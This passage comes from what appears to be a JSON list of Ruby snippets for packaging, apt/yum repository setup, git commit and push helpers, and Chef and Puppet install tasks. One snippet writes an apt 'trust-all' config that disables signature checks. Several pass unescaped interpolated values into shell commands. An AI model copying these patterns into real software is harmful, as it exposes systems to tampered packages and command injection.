for all the files to be included\n # in the package.\n config[:exes].each do | exe_name |\n exe_path = File.join(pkg_src_dir, exe_name.split('.').first)\n file exe_path => pkg_src_dir do\n cp exe_name, exe_path\n end\n\n # Add the file path as a dependency of the source tarball\n task orig_source_tarball_path => exe_path\n end\n\n # Create the task to populate the debian directory\n debian_task = \"populate_#{config[:package_name]}_debian_files\"\n task debian_task => package_debian_path do\n cp_r \"package_source/#{config[:package_name]}/debian\", pkg_src_dir\n end\n\n # Finally add the debian task as a dependency for the package task.\n task package_task_name => debian_task\nend",
"def commit_changes(description)\n git :add => '-A'\n git :commit => %Q(-qm \"thegarage-template: [#{@current_recipe}] #{description}\")\nend",
"def add_repo(pkg)\n if pkg[:repo] != nil\n if pkg[:repo].match(/^deb/)\n if pkg[:key] != nil\n # download and add key, add repo\n script \"add_repository\" do\n interpreter \"bash\"\n user \"root\"\n cwd \"/tmp\"\n code <<-EOS\n wget -q #{pkg[:key]} -O- | apt-key add -\n mkdir -p /etc/apt/sources.list.d\n echo \"#{pkg[:repo]}\" > /etc/apt/sources.list.d/virtualbox.list\n EOS\n end\n end\n elsif pkg[:repo].match(/^ppa/)\n # don't care about :key, add repo\n script \"add_repository\" do\n interpreter \"bash\"\n user \"root\"\n cwd \"/tmp\"\n code \"add-apt-repository #{pkg[:repo]}\"\n end\n end\n end\nend",
"def install_in_ubuntu\n install_ppa(node['SignalFx_ppa']['collectd']['name'],\n node['SignalFx_ppa']['collectd']['uri'])\n install_ppa(node['SignalFx_ppa']['collectd_plugin']['name'],\n node['SignalFx_ppa']['collectd_plugin']['uri'])\n ubuntu_update\n install_package 'collectd'\nend",
"def update\n app_dir = app_dir\n # there's probably a git gem we could use here\n system \"cd #{app_dir} && git pull\" unless app_dir.nil?\n system \"cd #{File.dirname(__FILE__)} && git pull\"\nend",
"def do_dmg_package_resource!\n dmg_package 'Chef Development Kit' do\n app dmg_package_app\n volumes_dir 'Chef Development Kit'\n source dmg_package_source\n type 'pkg'\n package_id 'com.getchef.pkg.chefdk'\n checksum dmg_package_checksum\n end\n end",
"def cmd_commit(msg)\n comment = msg[2].tr('\"', '')\n run_cmd(\"cd /etc;git add . && git commit -a -m \\\"#{comment}\\\"\")\n end",
"def install_custom!\n remote_file local_path do\n source new_resource.source.to_s\n checksum new_resource.checksum unless new_resource.checksum.nil?\n end\n dpkg_package local_path\n end",
"def packages_upload_deb(owner, repo, opts = {})\n data, _status_code, _headers = packages_upload_deb_with_http_info(owner, repo, opts)\n return data\n end",
"def generate_debian_dir(pkginfo, dir, options)\n options, unknown_options = Kernel.filter_options options,\n :distribution => nil,\n :override_existing => true,\n :patch_dir => nil\n\n distribution = options[:distribution]\n\n # Prepare fields for template\n package_info = pkginfo\n debian_name = debian_name(pkginfo)\n debian_version = debian_version(pkginfo, distribution)\n versioned_name = versioned_name(pkginfo, distribution)\n short_documentation = pkginfo.short_documentation\n documentation = pkginfo.documentation\n origin_information = pkginfo.origin_information\n source_files = pkginfo.source_files\n\n upstream_name = pkginfo.name\n copyright = pkginfo.copyright\n license = pkginfo.licenses\n\n deps = @dep_manager.filtered_dependencies(pkginfo)\n\n #debian names of rock packages\n deps_rock_packages = deps[:rock]\n deps_osdeps_packages = deps[:osdeps]\n deps_nonnative_packages = deps[:nonnative].to_a.flatten.compact\n\n dependencies = (deps_rock_packages + deps_osdeps_packages + deps_nonnative_packages).flatten\n build_dependencies = dependencies.dup\n\n this_rock_release = TargetPlatform.new(rock_release_name, target_platform.architecture)\n @rock_autobuild_deps[pkginfo.build_type].each do |pkginfo|\n name = debian_name(pkginfo)\n build_dependencies << this_rock_release.packageReleaseName(name)\n end\n\n # To handle postinstall\n DEFAULT_BUILD_DEPENDENCIES.each do |dep|\n build_dependencies << dep\n end\n\n DEFAULT_RUNTIME_DEPENDENCIES.each do |dep|\n dependencies << dep\n end\n\n if pkginfo.build_type == :cmake\n build_dependencies << \"cmake\"\n elsif pkginfo.build_type == :orogen\n build_dependencies << \"cmake\"\n orogen_command = pkginfo.orogen_command\n elsif pkginfo.build_type == :autotools\n if pkginfo.using_libtool\n build_dependencies << \"libtool\"\n end\n build_dependencies << \"autotools-dev\" # as autotools seems to be virtual...\n build_dependencies << \"autoconf\"\n build_dependencies << \"automake\"\n build_dependencies << \"dh-autoreconf\"\n elsif pkginfo.build_type == :ruby\n if pkginfo.is_bundle?\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle ruby package\"\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n dir = cleanup_existing_dir(dir, options)\n existing_debian_dir = File.join(pkginfo.srcdir,\"debian\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES\n end\n FileUtils.mkdir_p dir\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n rendered = template.result(binding)\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n if options[:patch_dir]\n whitelist = [ \"debian/rules\",\"debian/control\",\"debian/install\" ]\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: whitelist,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to debian folder of #{pkginfo.name}\"\n end\n end\n\n ########################\n # debian/compat\n ########################\n compatfile = File.join(dir,\"compat\")\n set_compat_level(DEBHELPER_DEFAULT_COMPAT_LEVEL, compatfile)\n end",
"def tailor_package_to_platform\n @package.app('Dropbox')\n @package.volumes_dir('Dropbox Installer')\n @package.source(URI.encode(\"file://#{download_dest}\"))\n end",
"def commit_modified_files_task\n really_modified = `#{git} ls-files -m #{modified_files.entries.join(' ')}`.split(\"\\n\")\n if really_modified.any?\n really_modified.each { |file| sh git, 'add', file }\n sh git, 'commit', '-m', \"Released #{gemspec.name} gem version #{gemspec.version}.\"\n end\n end",
"def apt_get_update_script\n <<-ENDSCRIPT\n if [[ ! -f /tmp/apt_sources.md5 ]]; then\n apt-get -q update\n\n md5sum /etc/apt/sources.list > /tmp/apt_sources.md5\n md5sum /etc/apt/sources.list.d/*.list >> /tmp/apt_sources.md5\n else\n md5sum /etc/apt/sources.list > /tmp/apt_sources_compare.md5\n md5sum /etc/apt/sources.list.d/*.list >> /tmp/apt_sources_compare.md5\n\n if [[ `diff /tmp/apt_sources.md5 /tmp/apt_sources_compare.md5` ]]; then\n apt-get -q update\n fi\n\n mv /tmp/apt_sources_compare.md5 /tmp/apt_sources.md5\n fi\n ENDSCRIPT\n end",
"def install_dev_repos_on(package, host, sha, repo_configs_dir, opts={})\n platform = host['platform'] =~ /^(debian|ubuntu)/ ? host['platform'].with_version_codename : host['platform']\n platform_configs_dir = File.join(repo_configs_dir, platform)\n\n case platform\n when /^(fedora|el|centos|sles)-(\\d+)-(.+)$/\n variant = (($1 == 'centos') ? 'el' : $1)\n fedora_prefix = ((variant == 'fedora') ? 'f' : '')\n version = $2\n arch = $3\n\n pattern = 'pl-%s-%s-%s-%s%s-%s.repo'\n\n repo_filename = pattern % [\n package,\n sha,\n variant,\n fedora_prefix,\n version,\n arch\n ]\n\n repo = fetch_http_file(\n \"%s/%s/%s/repo_configs/rpm/\" % [opts[:dev_builds_url],package, sha],\n repo_filename,\n platform_configs_dir\n )\n\n if /sles/i.match(platform)\n scp_to(host, repo, '/etc/zypp/repos.d/')\n else\n scp_to(host, repo, '/etc/yum.repos.d/')\n end\n\n when /^(debian|ubuntu)-([^-]+)-(.+)$/\n variant = $1\n version = $2\n arch = $3\n\n list = fetch_http_file(\n \"%s/%s/%s/repo_configs/deb/\" % [opts[:dev_builds_url],package, sha],\n \"pl-%s-%s-%s.list\" % [package, sha, version],\n platform_configs_dir\n )\n\n scp_to host, list, '/etc/apt/sources.list.d'\n if variant == 'ubuntu' && version.split('.').first.to_i >= 18\n apt_conf_content = 'Acquire::AllowInsecureRepositories \"true\";'\n else\n apt_conf_content = 'APT::Get::AllowUnauthenticated \"true\";'\n end\n create_remote_file(host, '/etc/apt/apt.conf.d/99trust-all', apt_conf_content)\n on host, 'apt-get update'\n else\n host.logger.notify(\"No repository installation step for #{platform} yet...\")\n end\n end",
"def commit(message)\n Dubya.logger.info \"Updating Git repository...\"\n system %(cd #{path} && git commit -am \"#{message}\" && git push)\n end",
"def add_source (source)\n open('/etc/apt/sources.list', 'a') { |f|\n f.puts source\n }\n end",
"def commit_to_git\n puts `git add .`\n puts `git commit -a -m \"New poshts for the syhtt\"`\n puts `git push blahg master`\n end",
"def commit_module(puppet_module)\n changes = Puppler::Git::Changes.new(puppet_module.name, puppet_module.git)\n commit_message = changelog(changes)\n unless options[:commit]\n log_info \"Not committing the following changes as requested: '#{changes.summary}'\"\n return\n end\n File.open(Puppler.workdir.join(\"commit_msg\"), 'w') do |file|\n file.write(commit_message)\n end\n\n git ['add', puppet_module.git.bundle.path.to_s], quiet: false, log_commandline: true\n git ['commit', '--file', Puppler.workdir.join(\"commit_msg\").to_s, puppet_module.git.bundle.path.to_s], quiet: false, log_commandline: true\n end",
"def update(dir, name = nil)\n since = Changelog.last_sha(@releases)\n release = Release.new(name)\n release.update(dir, since)\n add_release(release)\n end",
"def source_package(options)\n package_common(options) do |pkg|\n pkg.srcdir = pkg.name\n yield(pkg) if block_given?\n end\nend",
"def propose_dependency_update(app, branch_key, dependencies, target_version, base_branch)\n am_suffix = current_default_branch == base_branch ? '' : \"-#{base_branch}\"\n branch_name = '' == branch_key ? \"AM#{am_suffix}_update_#{get_shortest_group_name(dependencies)}\" : \"AM#{am_suffix}_#{branch_key}\"\n merge_origin = git_local_branch_list.include?(branch_name)\n git_checkout(base_branch)\n git_checkout(branch_name, true)\n git_merge(\"origin/#{base_branch}\") if merge_origin\n\n if patch_versions(app, dependencies, target_version)\n git_push\n else\n git_checkout(base_branch)\n mysystem(\"git branch -D #{branch_name} 2> /dev/null 1> /dev/null\")\n end\n end",
"def updateGit(source)\n dir = File.basename(source.sub(/\\.git$/, ''))\n if File.exists?(dir)\n system 'cd '+dir+' && git pull' or exit 1\n else\n system 'git clone ' + source or exit 1\n end\nend",
"def updateGit(source)\n dir = File.basename(source.sub(/\\.git$/, ''))\n if File.exists?(dir)\n system 'cd '+dir+' && git pull' or exit 1\n else\n system 'git clone ' + source or exit 1\n end\nend",
"def commit\n @repo.commit\n end",
"def make_pkg\n with_src_dir do\n if @tool == 'sbt'\n msg \"Updating Kafka\"\n exec './sbt update'\n msg \"Building Kafka\"\n exec './sbt package'\n #exec './sbt assembly-package-dependency'\n exec './sbt release-tar'\n else\n msg \"Using gradle\"\n exec './gradlew clean'\n exec './gradlew releaseTarGz'\n end\n end\n rel_dir = \"#{@src_dir}/target/RELEASE/kafka_*\"\n source_jar = expand \"#{rel_dir}/kafka_*.jar\"\n cp source_jar, \"#{@workdir}/usr/lib/kafka\"\n cptree \"#{rel_dir}/libs\", \"#{@workdir}/usr/lib/kafka\"\n cptree \"#{rel_dir}/config\", \"#{@workdir}/usr/lib/kafka\"\n cptree \"#{rel_dir}/bin\", \"#{@workdir}/usr/lib/kafka\"\n\n build_pkg\n end",
"def update_repository\n %x( cd #{@work_dir} && git fetch --tags )\n end",
"def packaging_task(dir_path, pkg_name)\n chdir dir_path do\n sh \"#{ZIP} #{ZIP_ARGS} -r -o ../#{pkg_name} * **/*\"\n end\nend",
"def stage_apt_archives(directory)\n find_command = \"find #{Pkg::Config.apt_repo_staging_path} -type d -name #{directory}\"\n find_command = \"find #{Pkg::Config.apt_repo_staging_path} -maxdepth 2 -type f\" if directory == 'main'\n command = <<-CMD\n for stuff in $(#{find_command}); do\n find $stuff -type l -delete\n codename=$(dirname ${stuff##{Pkg::Config.apt_repo_staging_path}/})\n sudo mkdir --parents #{Pkg::Config.freight_archive_path}/$codename\n sudo chown root:release -R #{Pkg::Config.freight_archive_path}/$codename\n sudo chmod g+w -R #{Pkg::Config.freight_archive_path}/$codename\n mv $stuff #{Pkg::Config.freight_archive_path}/$codename\n\n pool_directory=#{Pkg::Config.apt_repo_path}/pool/$codename/#{directory}\n if [ ! -d $pool_directory ]; then\n echo \"Can't find directory $pool_directory, it may have already been archived, skipping . . .\"\n continue\n fi\n sudo mkdir --parents /opt/tmp-apt\n sudo chown root:release -R /opt/tmp-apt\n sudo chmod g+w -R /opt/tmp-apt\n mv $pool_directory /opt/tmp-apt\n done\n CMD\n Pkg::Util::Net.remote_execute(Pkg::Config.staging_server, command)\n end",
"def packaging_task(dir_path, pkg_name)\n chdir dir_path do\n sh \"#{ZIP} -9 -r -o ../#{pkg_name} * **/*\"\n end\nend",
"def update_appd_cookbook\n @ssh.exec! \"cd #{APPD_COOKBOOK_PATH}; git pull origin master\", sudo: true\n chef_exec \"berks install --path #{@cookbook_path.first} --berksfile #{APPD_COOKBOOK_PATH}/Berksfile\"\n end",
"def git\n require 'parsedate'\n puts 'Doing local Git commit...'\n d = Time.new()\n git_comment = \"#{d}\"\n `git add ../.`\n `git commit ../. -m \"#{git_comment}\"`\nend",
"def gemfile spec, source, destination = nil\n destination ||= File.expand_path \".\"\n\n require \"rubygems/builder\"\n\n Dir.chdir source do\n FileUtils.mv Gem::Builder.new(spec).build, destination\n end\n\n destination\n end",
"def push(downstream, upstream, remote_branch='svn_git_port')\n name=get_dir_name(downstream, upstream)\n upstream_dir=File.join(name, 'upstream')\n Dir.chdir(upstream_dir) do\n puts `git checkout -b push`\n puts `git push upstream HEAD:#{remote_branch}`\n end\nend",
"def scm_update(path,uri=nil)\n cd(path) { sh 'svn', 'update' }\n end",
"def upgrade_repo!\n package 'apt-transport-https'\n include_recipe \"apt-chef::#{new_resource.channel}\"\n package('chefdk') { action :upgrade }\n end",
"def pkg_cmd; \"#{pkg_binary}\" end",
"def rearrange_and_reship(rake, target_repo, signing_bundle)\n puts \"Retrieving packages...\"\n system(\"#{rake} -s pl:jenkins:retrieve &> /dev/null\")\n\n puts \"Moving the packages into the new layout...\"\n puts \"Moving debs...\"\n rearrange_packages(\"pkg/deb\", \"new_pkg/deb\", target_repo, [\"\"])\n puts \"Moving rpms...\"\n rearrange_packages(\"pkg/el\", \"new_pkg/el\", target_repo, [\"i386\", \"x86_64\", \"SRPMS\"])\n rearrange_packages(\"pkg/fedora\", \"new_pkg/fedora\", target_repo, [\"i386\", \"x86_64\", \"SRPMS\"])\n\n puts \"Moving new_pkg into place on top of pkg...\"\n FileUtils.mv(\"pkg\", \"old_pkg\")\n FileUtils.mv(\"new_pkg\", \"pkg\")\n\n puts \"uber_shipping relocated packages...\"\n ENV[\"SIGNING_BUNDLE\"] = \"../#{signing_bundle}\"\n ENV[\"TAR\"] = \"FALSE\"\n system(\"#{rake} -s pl:jenkins:sign_all pl:uber_ship pl:remote:update_apt_repo pl:remote:update_yum_repo\")\nend",
"def BackUpAllTargetSources\n Yast.import \"Directory\"\n\n repos_dir = \"/etc/zypp/repos.d\"\n\n if !FileUtils.Exists(repos_dir)\n Builtins.y2error(\"Directory %1 doesn't exist!\", repos_dir)\n return\n end\n\n current_repos = Convert.convert(\n SCR.Read(path(\".target.dir\"), repos_dir),\n :from => \"any\",\n :to => \"list <string>\"\n )\n\n if current_repos == nil || Builtins.size(current_repos) == 0\n Builtins.y2warning(\n \"There are currently no repos in %1 conf dir\",\n repos_dir\n )\n return\n else\n Builtins.y2milestone(\n \"These repos currently exist on a target: %1\",\n current_repos\n )\n end\n\n cmd = Convert.to_map(\n WFM.Execute(path(\".local.bash_output\"), \"date +%Y%m%d-%H%M%S\")\n )\n a_name_list = Builtins.splitstring(\n Ops.get_string(cmd, \"stdout\", \"the_latest\"),\n \"\\n\"\n )\n archive_name = Ops.add(\n Ops.add(\"repos_\", Ops.get(a_name_list, 0, \"\")),\n \".tgz\"\n )\n\n shellcommand = Builtins.sformat(\n \"mkdir -p '%1' && cd '%1' && /bin/tar -czf '%2' '%3'\",\n String.Quote(Ops.add(Directory.vardir, \"/repos.d_backup/\")),\n String.Quote(archive_name),\n String.Quote(repos_dir)\n )\n cmd = Convert.to_map(\n SCR.Execute(path(\".target.bash_output\"), shellcommand)\n )\n\n if Ops.get_integer(cmd, \"exit\", -1) != 0\n Builtins.y2error(\n \"Unable to backup current repos; Command >%1< returned: %2\",\n shellcommand,\n cmd\n )\n end\n\n success = nil\n\n Builtins.foreach(current_repos) do |one_repo|\n one_repo = Ops.add(Ops.add(repos_dir, \"/\"), one_repo)\n Builtins.y2milestone(\"Removing target repository %1\", one_repo)\n success = Convert.to_boolean(\n SCR.Execute(path(\".target.remove\"), one_repo)\n )\n Builtins.y2error(\"Cannot remove %1 file\", one_repo) if success != true\n end\n\n Builtins.y2milestone(\"All old repositories were removed from the target\")\n\n nil\n end",
"def package(path, target)\n # Load manifest\n puts \"Load manifest...\"\n manifest = YAML::load_file(File.join(path, 'manifest.yml'))\n \n # Target directory for package files\n puts \"Target is: #{target}\"\n Dir.mkdir(target) if not File.exists?(target)\n \n # Package name\n package = \"#{manifest['name']}-#{manifest['version']}\"\n puts \"Package: #{package}\"\n \n # Tgz\n manifest['package'] = \"#{package}.tgz\"\n command = \"tar -czf #{package}.tgz --exclude pkg -C #{path} .\"\n puts \"Packing: #{command}\"\n system command\n \n # Move\n puts \"Finishing..\"\n FileUtils.mv(\"#{package}.tgz\", target)\n File.open(File.join(target, \"#{package}.yml\"), 'w') do |f|\n f.puts(manifest.to_yaml)\n f.close\n end\n \n puts \"Done.\"\nend",
"def package_file\n File.join('/tmp/fpm-recipes/duo-openvpn/pkg',\n case node['platform_family']\n when 'debian'\n \"duo-openvpn_#{version}-#{revision}_amd64.deb\"\n when 'rhel'\n \"duo-openvpn-#{version}-#{revision}.x86_64.rpm\"\n end)\n end",
"def push_fedora(cx)\n\tComponent.reset_counters( cx.id, :master_files )\n\ttitle = (cx.title or cx.content_desc.strip)\n\tputs \"[#{cx.id}]: #{title}\"\n\tFedora.create_or_update_object( cx, title )\n\tcx.update_attribute( :date_dl_ingest, Time.now ) if cx.date_dl_ingest.nil? \n\tcx.update_metadata('allxml')\n\tcx.save! \n\tcx.master_files.each { |mf| mf.update_metadata( 'allxml' ); mf.save! } \nend",
"def update_version(branch, version, opts={})\n dir = File.join(branch, version)\n status \"Update version #{dir}\"\n\n # initialize directory\n run \"rm -rf #{dir}\"\n run \"mkdir -p #{dir}\"\n run \"cp docker-entrypoint.sh #{dir}\"\n\n if branch == \"ensocoin\"\n run \"sed -i 's/printtoconsole=1/addnode=178.88.115.118\\\\\\n addnode=194.87.146.58\\\\\\n printtoconsole=1/' #{dir}/docker-entrypoint.sh\"\n\n run \"sed -i 's/bitcoin.conf/ensocoin.conf/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-cli/ensocoin-cli/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-tx/ensocoin-tx/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/test_bitcoin/test_ensocoin/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoind/ensocoind/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/\\\\\\.bitcoin/.ensocoin/' #{dir}/docker-entrypoint.sh\"\n elsif branch == \"thebestcoin\"\n run \"sed -i 's/^\\\\(\\\\s*\\\\)printtoconsole=1/\\\\1addnode=5.230.11.232\\\\\\n\\\\1addnode=5.230.11.233\\\\\\n\\\\1printtoconsole=1/' #{dir}/docker-entrypoint.sh\"\n\n run \"sed -i 's/bitcoin.conf/thebestcoin.conf/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-cli/thebestcoin-cli/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoin-tx/thebestcoin-tx/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/test_bitcoin/test_thebestcoin/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/bitcoind/thebestcoind/' #{dir}/docker-entrypoint.sh\"\n run \"sed -i 's/\\\\\\.bitcoin/.thebestcoin/' #{dir}/docker-entrypoint.sh\"\n end\n\n # render Dockerfile\n opts[:version] = version\n opts[:home] = '.bitcoin'\n opts[:ports] = '8332 8333 18332 18333'\n\n if branch == \"ensocoin\"\n opts[:home] = '.ensocoin'\n opts[:ports] = '7992 7993 17992 17993'\n elsif branch == \"thebestcoin\"\n opts[:home] = '.thebestcoin'\n opts[:ports] = '8801 8802 18801 18802'\n end\n\n dockerfile = ERB.new(File.read(\"Dockerfile.erb\"), nil, \"-\")\n result = dockerfile.result(OpenStruct.new(opts).instance_eval { binding })\n File.write(File.join(dir, \"Dockerfile\"), result)\nend",
"def install_dev_repo_on(host, package, sha, repo_configs_dir)\n platform = host['platform'] =~ /^(debian|ubuntu)/ ? host['platform'].with_version_codename : host['platform']\n platform_configs_dir = File.join(repo_configs_dir, platform)\n\n case platform\n when /^(fedora|el|centos)-(\\d+)-(.+)$/\n variant = (($1 == 'centos') ? 'el' : $1)\n fedora_prefix = ((variant == 'fedora') ? 'f' : '')\n version = $2\n arch = $3\n\n #hack for https://tickets.puppetlabs.com/browse/RE-1990\n # Previously this used `host.is_pe?`, but with AIO this is no longer\n # reliable. Defaulting to `true` since these tests only happen in PE.\n if true\n pattern = \"pl-%s-%s-repos-pe-%s-%s%s-%s.repo\"\n else\n pattern = \"pl-%s-%s-%s-%s%s-%s.repo\"\n end\n repo_filename = pattern % [\n package,\n sha,\n variant,\n fedora_prefix,\n version,\n arch\n ]\n\n repo = fetch(\n \"http://builds.puppetlabs.lan/%s/%s/repo_configs/rpm/\" % [package, sha],\n repo_filename,\n platform_configs_dir\n )\n\n scp_to(host, repo, '/etc/yum.repos.d/')\n\n when /^(debian|ubuntu)-([^-]+)-(.+)$/\n variant = $1\n version = $2\n arch = $3\n\n list = fetch(\n \"http://builds.puppetlabs.lan/%s/%s/repo_configs/deb/\" % [package, sha],\n \"pl-%s-%s-%s.list\" % [package, sha, version],\n platform_configs_dir\n )\n\n scp_to host, list, '/etc/apt/sources.list.d'\n on host, 'apt-get update'\n else\n host.logger.notify(\"No repository installation step for #{platform} yet...\")\n end\n end",
"def make_svn_changelog( dir='.' )\n\trequire 'xml/libxml'\n\n\tchangelog = ''\n\tpath_prefix = '/' + get_svn_path( dir ) + '/'\n\n\txmllog = make_xml_svn_log( dir, 0 )\n\n\tparser = XML::Parser.string( xmllog )\n\troot = parser.parse.root\n\troot.find( '//log/logentry' ).to_a.reverse.each do |entry|\n\t\ttrace \"Making a changelog entry for r%s\" % [ entry['revision'] ]\n\n\t\tadded = []\n\t\tdeleted = []\n\t\tchanged = []\n\n\t\tentry.find( 'paths/path').each do |path|\n\t\t\tpathname = path.content\n\t\t\tpathname.sub!( path_prefix , '' ) if pathname.count('/') > 1\n\n\t\t\tcase path['action']\n\t\t\twhen 'A', 'R'\n\t\t\t\tif path['copyfrom-path']\n\t\t\t\t\tverb = path['action'] == 'A' ? 'renamed' : 'copied'\n\t\t\t\t\tadded << \"%s\\n#{FILE_INDENT}-> #{verb} from %s@r%s\" % [\n\t\t\t\t\t\tpathname,\n\t\t\t\t\t\tpath['copyfrom-path'],\n\t\t\t\t\t\tpath['copyfrom-rev'],\n\t\t\t\t\t]\n\t\t\t\telse\n\t\t\t\t\tadded << \"%s (new)\" % [ pathname ]\n\t\t\t\tend\n\t\t\t\n\t\t\twhen 'M'\n\t\t\t\tchanged << pathname\n\t\t\t\n\t\t\twhen 'D'\n\t\t\t\tdeleted << pathname\n\t\t\t\n\t\t\telse\n\t\t\t\tlog \"Unknown action %p in rev %d\" % [ path['action'], entry['revision'] ]\n\t\t\tend\n\t\t\n\t\tend\n\n\t\tdate = Time.parse( entry.find_first('date').content )\n\n\t\t# cvs2svn doesn't set 'author'\n\t\tauthor = 'unknown'\n\t\tif entry.find_first( 'author' )\n\t\t\tauthor = entry.find_first( 'author' ).content\n\t\tend\n\t\t \n\t\tmsg = entry.find_first( 'msg' ).content\n\t\trev = entry['revision']\n\n\t\tchangelog << \"-- #{date.rfc2822} by #{author} (r#{rev}) -----\\n\"\n\t\tchangelog << \" Added: \" << humanize_file_list(added) << \"\\n\" unless added.empty?\n\t\tchangelog << \" Changed: \" << humanize_file_list(changed) << \"\\n\" unless changed.empty?\n\t\tchangelog << \" Deleted: \" << humanize_file_list(deleted) << \"\\n\" unless deleted.empty?\n\t\tchangelog << \"\\n\"\n\t\t\n\t\tindent = msg[/^(\\s*)/] + LOG_INDENT\n\t\t\n\t\tchangelog << indent << msg.strip.gsub(/\\n\\s*/m, \"\\n#{indent}\")\n\t\tchangelog << \"\\n\\n\\n\"\n\tend\n\t\n\treturn changelog\nend",
"def publish_to_cocoapods()\n command = \"cd downstream_repos/card.io-iOS-SDK;\"\n command += \"pod trunk push CardIO.podspec\"\n \n CommandProcessor.command(command, live_output=true)\nend",
"def git_update(dir=nil)\n if dir.nil?\n directory = \"#{CSV.split(\"/\")[0..-2].join(\"/\")}/\"\n else\n directory = dir\n end\n Dir.chdir(directory) do \n system('git pull origin master')\n end\nend",
"def rearrange_packages(source_directory, target_directory, target_repo, subdirs)\n targets = get_directories(source_directory)\n unless targets.empty?\n FileUtils.mkdir_p(target_directory)\n targets.each do |target|\n subdirs.each do |subdir|\n target_dir = \"#{target_directory}/#{target}/#{target_repo}/#{subdir}\"\n FileUtils.mkdir_p(target_dir)\n packages = get_files(\"#{source_directory}/#{target}/**/#{subdir}\")\n FileUtils.cp(packages, target_dir)\n end\n end\n end\nend",
"def repo_commit(msg)\n git :add => '-u'\n git :add => '.'\n git :commit => \"-m \\\"#{msg}\\\"\" \n end",
"def update_filepath(_package_id:, _filepath:, _sha1:, _size:); end",
"def after_release_email(tag, note, type, selector, options) \n command = \"origen web compile --remote --api\" \n Dir.chdir Origen.root do \n system command \n end \n end",
"def sync_code_dir\n fs_commands = { 'commit': '{\"commit-all\": true}', 'force-sync': \"\" }\n fs_commands.each do |fs_cmd, data|\n curl = %W[\n curl\n -X POST\n --cert $(puppet config print hostcert)\n --key $(puppet config print hostprivkey)\n --cacert $(puppet config print localcacert)\n -H \"Content-type: application/json\"\n https://#{master}:8140/file-sync/v1/#{fs_cmd}\n -d '#{data}'\n ].join(\" \")\n\n on(master, curl)\n end\n end",
"def branded_zone_post_install(options)\n options['zonedir'] = options['zonedir']+\"/\"+options['name']\n if File.directory?(options['zonedir'])\n options['clientdir'] = options['zonedir']+\"/root\"\n var_dir = \"/var/tmp\"\n tmp_dir = options['clientdir']+\"/\"+var_dir\n post_file = tmp_dir+\"/postinstall.sh\"\n tmp_file = \"/tmp/zone_\"+options['name']\n pkg_name = \"pkgutil.pkg\"\n pkg_url = $local_opencsw_mirror+\"/\"+pkg_name\n pkg_file = tmp_dir+\"/\"+pkg_name\n wget_file(options,pkg_url,pkg_file)\n file = File.open(tmp_file,\"w\")\n file.write(\"#!/usr/bin/bash\\n\")\n file.write(\"\\n\")\n file.write(\"# Post install script\\n\")\n file.write(\"\\n\")\n file.write(\"cd #{var_dir} ; echo y |pkgadd -d pkgutil.pkg CSWpkgutil\\n\")\n file.write(\"export PATH=/opt/csw/bin:$PATH\\n\")\n file.write(\"pkutil -i CSWwget\\n\")\n file.write(\"\\n\")\n file.close\n message = \"Information:\\tCreating post install script \"+post_file\n command = \"cp #{tmp_file} #{post_file} ; rm #{tmp_file}\"\n execute_command(options,message,command)\n else\n handle_output(options,\"Warning:\\tZone #{options['name']} doesn't exist\")\n quit(options)\n end\n return\nend",
"def move_package\n begin\n package_file = File.join(@tmpdir, 'pkg', \"#{@plugin.vendor}-#{@package_name}-#{@plugin.metadata[:version]}.tar.gz\")\n FileUtils.cp(package_file, '.')\n rescue => e\n puts 'Could not copy package to working directory'\n raise e\n end\n end",
"def setup_new_package(package_name, parent_ids=[])\n package_id, definition = add_package(package_name, parent_ids)\n\n # update current package id\n set(current_package_id: package_id, current_definition: definition)\n end",
"def publish_changes(directory)\n return unless anything_to_commit?(directory)\n\n directory && :not_implemented\n end",
"def git_commit_and_push(cookbook_path, github_url)\n if File.exists?(File.join(cookbook_path, \".git\"))\n shell_out(\"git remote rm origin\", :cwd => cookbook_path)\n else\n shell_out!(\"git init\", :cwd => cookbook_path)\n end\n shell_out!(\"echo - $(date): Uploaded with knife github plugin. >> CHANGELOG.md \", :cwd => cookbook_path)\n shell_out!(\"git add .\", :cwd => cookbook_path)\n shell_out!(\"git commit -m 'creating initial cookbook structure from the knife-github plugin' \", :cwd => cookbook_path)\n shell_out!(\"git remote add origin #{github_url} \", :cwd => cookbook_path)\n shell_out!(\"git push -u origin master\", :cwd => cookbook_path)\n end",
"def install_jaunty_sources\n has_exec(\"apt-get update\", :action => :nothing)\n\n lines =<<-EOF\ndeb http://archive.ubuntu.com/ubuntu/ jaunty main restricted\ndeb http://archive.ubuntu.com/ubuntu/ jaunty universe\ndeb http://archive.ubuntu.com/ubuntu/ jaunty multiverse\ndeb-src http://archive.ubuntu.com/ubuntu/ jaunty main restricted\ndeb-src http://archive.ubuntu.com/ubuntu/ jaunty universe\ndeb-src http://archive.ubuntu.com/ubuntu/ jaunty multiverse\nEOF\n lines.each_line do |l|\n has_line_in_file do \n file \"/etc/apt/sources.list\"\n line l \n notifies get_exec(\"apt-get update\"), :run\n end\n end\n end",
